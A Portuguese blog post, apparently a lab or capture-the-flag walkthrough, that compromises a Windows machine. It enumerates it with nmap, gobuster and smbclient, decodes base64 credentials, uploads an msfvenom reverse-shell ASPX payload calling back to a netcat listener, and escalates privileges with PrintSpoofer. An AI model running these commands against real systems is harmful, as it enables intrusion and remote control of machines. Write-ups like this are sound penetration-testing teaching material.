Penetração em Servidor Windows com SMB e Elevação de Privilégios

Este artigo doucmenta um processo de avaliação de segurança em um ambiente Windows, seguindo metodologias de teste de penetração. O objetivo principal é identificar vulnerabilidades e obter acesso privilegiado ao sistema.

Reconhecimento Inicial

O primeiro passo consiste em mapear os serviços expostos pela máquina alvo através de varredura de portas:

nmap -p- 192.168.45.112

Após identificar as portas abertas, realizamos uma análise mais detalhada:

nmap -p 80,135,139,445,3389,49663,49667,49669 192.168.45.112 -sV -sC

A análise revela serviços HTTP nos portais 80 e 49663. Procedemos com a enumeração de diretórios:

gobuster dir -u http://192.168.45.112:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' --status-codes-blacklist '' --no-error -t 50

Exploração do Serviço SMB

Identificamos um compartilhamento SMB acessível através do caminho /nt4wrksv/. Procedemos com a enumeração dos recursos compartilhados:

smbclient -L \\\\192.168.45.112

Detectamos um usuário chamado "nt4wrksv". Tentamos acessar o compartilhamento com este usuário:

smbclient //192.168.45.112/nt4wrksv

Durante a exploração, encontramos dois registros codificados em base64. Decodificamos para obter credenciais:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

Ganhando Acesso Inicial

Utilizamos as credenciais obtidas para criar um payload reverso:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.10 LPORT=4444 -f aspx -o reverso.aspx

Iniciamos um listener na máquina de ataque:

nc -lvnp 4444

Fazemos o upload do arquivo reverso através do compartilhamento SMB e o executamos:

curl http://192.168.45.112:49663/nt4wrksv/reverso.aspx

Obtendo a Flag de Usuário

Com o shell obtido, prcouramos pela flag do usuário:

dir /s /b c:\ | find "user.txt"

Elevação de Privilegios

Verificamos os privilégios do usuário atual:

whoami /priv

Idnetificamos a permissão SeImpersonatePrivilege, que nos permite escalar privilégios. Baixamos e utilizamos a ferramenta PrintSpoofer:

cd c:\inetpub\wwwroot\nt4wrksv\
PrintSpoofer64.exe -i -c cmd

Obtendo a Root Flag

Após a elevação de privilégios, acessamos o diretório do administrador:

cd /users/administrator

Tags: pentest Windows SMB enumeracao escalada-de-privilegios

Publicado em 6-12 21:42 por Thomas

Tags em Destaque

©2026 Doido Dev